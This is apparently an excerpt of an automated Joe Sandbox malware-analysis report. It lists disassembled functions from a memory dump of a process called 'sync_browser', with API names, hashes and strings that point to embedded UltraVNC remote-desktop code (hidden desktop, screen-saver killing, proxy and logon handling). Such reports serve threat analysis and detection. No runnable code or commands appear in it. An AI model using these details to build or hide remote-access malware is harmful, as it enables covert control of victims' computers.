                                                                                          • Instruction ID: 24dde60466fd18b880fd784c1f5e0b36d16e686afee6bdc8b77d0cd841bcee05
                                                                                          • Opcode Fuzzy Hash: 53fb3c1bb1965282e4da31d922302c79b62d7af4abef1ccc30ce768ea4cf9713
                                                                                          • Instruction Fuzzy Hash: 88613863B29AC281E714DB64E4553F977A4EB64708F844036FA8ECB291EE3CD14EC300
                                                                                          APIs
                                                                                          Strings
                                                                                          • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries, xrefs: 00007FF67E7D564A
                                                                                          • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called, xrefs: 00007FF67E7D557A
                                                                                          • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done, xrefs: 00007FF67E7D577E
                                                                                          • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette, xrefs: 00007FF67E7D561C
                                                                                          • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table, xrefs: 00007FF67E7D55BD
                                                                                          • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette, xrefs: 00007FF67E7D5603
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorFreeLastLibrary$AddressDeleteDisplayEntriesEnumHeapLoadPaletteProcReleaseSettingsSystem_errnofreemalloc
                                                                                          • String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done
                                                                                          • API String ID: 181403729-1081969236
                                                                                          • Opcode ID: 53fd9ebbc342151809572dc5d5c454a9c87e4ee11642373697c9161ead6f8e27
                                                                                          • Instruction ID: 58c0bb0a1737714216bb2d1863a0f4bd9e4bec170440b5beac9638ddc8c9fee5
                                                                                          • Opcode Fuzzy Hash: 53fd9ebbc342151809572dc5d5c454a9c87e4ee11642373697c9161ead6f8e27
                                                                                          • Instruction Fuzzy Hash: 65514863B2998282E714DB64E8542FC6395EF65748F94413AFD8ECB695DE3CE14EC300
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _wgetenv$free$_errno_invalid_parameter_noinfoinet_ntoa
                                                                                          • String ID: !$CONNECT_DIRECT$HTTP_DIRECT$SOCKS4_DIRECT$SOCKS5_DIRECT$SOCKS_DIRECT
                                                                                          • API String ID: 1123868200-453874877
                                                                                          • Opcode ID: 02c3fb42e6d6bc28dc7b44bb22b1b02568e63af234dce31050af9c07c747a59d
                                                                                          • Instruction ID: 785cab2dd14ca34c165c18db6b45e7b6d4027f90d781c34cf84cc186fe3459e4
                                                                                          • Opcode Fuzzy Hash: 02c3fb42e6d6bc28dc7b44bb22b1b02568e63af234dce31050af9c07c747a59d
                                                                                          • Instruction Fuzzy Hash: 6D51A423B2968285EE619B65E4502B9A7A8FFA4784F480535FA4DC77A5EF3CE448C700
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateRect$DeleteObject$Combinefree$ErrorFreeHeapLast_errnomalloc
                                                                                          • String ID:
                                                                                          • API String ID: 1881577244-0
                                                                                          • Opcode ID: a2669a54d84d0355307a6dfdc82ec72f79d1e54b2eee423c051edab8dd6adb49
                                                                                          • Instruction ID: e4b055b42100baac16e4c3361f816f44d95be074cfb5f7cbb3a2e434f85202a3
                                                                                          • Opcode Fuzzy Hash: a2669a54d84d0355307a6dfdc82ec72f79d1e54b2eee423c051edab8dd6adb49
                                                                                          • Instruction Fuzzy Hash: 4AA1B273B286864ADB248F19E444A7AB755FBA4B88F501135ED0ED3B54DF3CE809CB00
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Combine$DeleteObjectRectfree$Offset$Create
                                                                                          • String ID:
                                                                                          • API String ID: 2677898628-0
                                                                                          • Opcode ID: 3ee7ecd204df7dd3f615213fc9b16b46c74043faa91b9eb9bd615f088202f8d8
                                                                                          • Instruction ID: 59839947d118c08f70165652cee149a4f9bc93b7e39eaee0c3d2da4722e04c34
                                                                                          • Opcode Fuzzy Hash: 3ee7ecd204df7dd3f615213fc9b16b46c74043faa91b9eb9bd615f088202f8d8
                                                                                          • Instruction Fuzzy Hash: A4412A77B2492189EB10DBA6E8559AD7730FB94B99B404132EE1E97B68CF3CD449C300
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$Leave$DesktopEnter$CloseInputInvalidateOpenRect
                                                                                          • String ID: W$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                                          • API String ID: 1769082246-4238595597
                                                                                          • Opcode ID: e970080873c8215d67751cf4df8fe2b5e593792b79e840585fb32c8e919cf0fc
                                                                                          • Instruction ID: 205f3d099eade47da72e73591b1c194b2f1992640dd6f518f620d1e353a2b5e0
                                                                                          • Opcode Fuzzy Hash: e970080873c8215d67751cf4df8fe2b5e593792b79e840585fb32c8e919cf0fc
                                                                                          • Instruction Fuzzy Hash: 93E1D033A18AD185EB54CB29C458BFE7BA5EB99B84F154132EA4C877A5CF3CE449C700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Library$AddressFileFreeInitializeLoadModuleNameOpenPrivateProcProfileUninitialize
                                                                                          • String ID: CUPSD$CheckUserPasswordSDUni result=%i$WARNING$You selected ms-logon, but authSSP.dllwas not found.Check you installation$\authSSP.dll$vncntlm.cpp : GetProcAddress
                                                                                          • API String ID: 1719662965-904825817
                                                                                          • Opcode ID: 49f2f648c281e1af0c21fd0208b7c79f38fee02d2a9911ef4cddafc3a37f6c47
                                                                                          • Instruction ID: 4ad2823015636e7862078f0ae4f7ec7be8ac3068cfc9421eaddf44376b2a12be
                                                                                          • Opcode Fuzzy Hash: 49f2f648c281e1af0c21fd0208b7c79f38fee02d2a9911ef4cddafc3a37f6c47
                                                                                          • Instruction Fuzzy Hash: 7E41A423B28A8295FA209B65A8453B9A3A4FF68780F445536FD6DC77A5DE3CE14CC700
                                                                                          APIs
                                                                                          Strings
                                                                                          • HideDesktop.cpp : Failed to restore SPI value for SPI_SETFONTSMOOTHINGTYPE (0x%08x), xrefs: 00007FF67E7CAC72
                                                                                          • HideDesktop.cpp : Failed to restore SPI value for SPI_SETCLEARTYPE (0x%08x), xrefs: 00007FF67E7CAC17
                                                                                          • HideDesktop.cpp : Failed to restore SPI value for SPI_SETFONTSMOOTHING (0x%08x), xrefs: 00007FF67E7CABB9
                                                                                          • HideDesktop.cpp : Restored SPI value for SPI_SETFONTSMOOTHINGTYPE: 0x%08x, xrefs: 00007FF67E7CAC8A
                                                                                          • HideDesktop.cpp : Restored SPI value for SPI_SETFONTSMOOTHING: 0x%08x, xrefs: 00007FF67E7CABD4
                                                                                          • HideDesktop.cpp : Restored SPI value for SPI_SETCLEARTYPE: 0x%08x, xrefs: 00007FF67E7CAC2F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorInfoLastParametersSystem
                                                                                          • String ID: HideDesktop.cpp : Failed to restore SPI value for SPI_SETCLEARTYPE (0x%08x)$HideDesktop.cpp : Failed to restore SPI value for SPI_SETFONTSMOOTHING (0x%08x)$HideDesktop.cpp : Failed to restore SPI value for SPI_SETFONTSMOOTHINGTYPE (0x%08x)$HideDesktop.cpp : Restored SPI value for SPI_SETCLEARTYPE: 0x%08x$HideDesktop.cpp : Restored SPI value for SPI_SETFONTSMOOTHING: 0x%08x$HideDesktop.cpp : Restored SPI value for SPI_SETFONTSMOOTHINGTYPE: 0x%08x
                                                                                          • API String ID: 2777246624-426764769
                                                                                          • Opcode ID: be58b1c1191ffcc8586d2d23b3617e6acfb6b4a2149be82d11eb37b622f5d697
                                                                                          • Instruction ID: c1502c0f7f838ab6102763a4071021eb6070060af62c72656a6e2bb391e59b00
                                                                                          • Opcode Fuzzy Hash: be58b1c1191ffcc8586d2d23b3617e6acfb6b4a2149be82d11eb37b622f5d697
                                                                                          • Instruction Fuzzy Hash: 92313A67F3894356F7208B65E804BB5A7A9BF75749F444632F40ED26B1EE2CA84EC300
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$LeaveObject$BitmapCompatibleCreateDeleteEnterSelect
                                                                                          • String ID:
                                                                                          • API String ID: 4219907860-0
                                                                                          • Opcode ID: 956026f9412a0f1138a85547ad9db4196a3aa927d16836a46ddc08f3773cee07
                                                                                          • Instruction ID: 17a1394946205b5e5f3315141fb9286950674da3ca5ee51911e9fa6ad08ba5a9
                                                                                          • Opcode Fuzzy Hash: 956026f9412a0f1138a85547ad9db4196a3aa927d16836a46ddc08f3773cee07
                                                                                          • Instruction Fuzzy Hash: 79416723A286929AE7209F55E8446AEB394FB98BD8F005135EE4E87B54DF3CD109CB00
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: PrivateProfile$FileModuleNameStringVersion
                                                                                          • String ID: -service_run$_run$admin$clearconsole$kickrdp$service_commandline
                                                                                          • API String ID: 769895750-1251308945
                                                                                          • Opcode ID: 24b3510015302fc578f6c228e9c0541bd07d85315ab1c4ac955448dfc9505119
                                                                                          • Instruction ID: 4aa3e65281f22c969ae1d7f3fa7423e9f2c0bb7bfb42458fa4335826d4e942e6
                                                                                          • Opcode Fuzzy Hash: 24b3510015302fc578f6c228e9c0541bd07d85315ab1c4ac955448dfc9505119
                                                                                          • Instruction Fuzzy Hash: 51519066A6868285E760CB64E4402BAB7A0FB557B0F448336FA7D836E5CF3DD44DC710
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Desktop$CloseEnumFindInfoMessageOpenParametersPostSystemVersionWindowWindows
                                                                                          • String ID: Screen-saver$WindowsScreenSaverClass$vncdesktop.cpp : KillScreenSaver...$vncdesktop.cpp : Killing ScreenSaver
                                                                                          • API String ID: 1547096108-1130181218
                                                                                          • Opcode ID: 0218681f0ca0f0cb8045d3d881905bd2119dca5bb8d2230a423cfe654c101359
                                                                                          • Instruction ID: 70df1adb1c0c2014bd16a7f9b83b6f94ecccba0b80eb7cebd6fff1b46297e01e
                                                                                          • Opcode Fuzzy Hash: 0218681f0ca0f0cb8045d3d881905bd2119dca5bb8d2230a423cfe654c101359
                                                                                          • Instruction Fuzzy Hash: 50316427E38A4281FB64DB15E8657B9A351FFA8704F845131E90E82B95DE3CE01DC700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressHandleModuleProc$CountCriticalInitializeSectionTick
                                                                                          • String ID: 0$GetSystemTimes$NtQuerySystemInformation$kernel32.dll$ntdll.dll
                                                                                          • API String ID: 649669561-4005017345
                                                                                          • Opcode ID: eb4ac79b3cafd47dc512236d2ad93d7dd504d87db7fd05d4a85e566fa415a874
                                                                                          • Instruction ID: 871a5cda80039efd594e1a1768f5014084f1e42a876aecba17252a1fd3c83cd6
                                                                                          • Opcode Fuzzy Hash: eb4ac79b3cafd47dc512236d2ad93d7dd504d87db7fd05d4a85e566fa415a874
                                                                                          • Instruction Fuzzy Hash: 61214F32A29B0586EB44DF64E844368B3E4FF68B94F444134E96D873A4EF3CE448C740
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
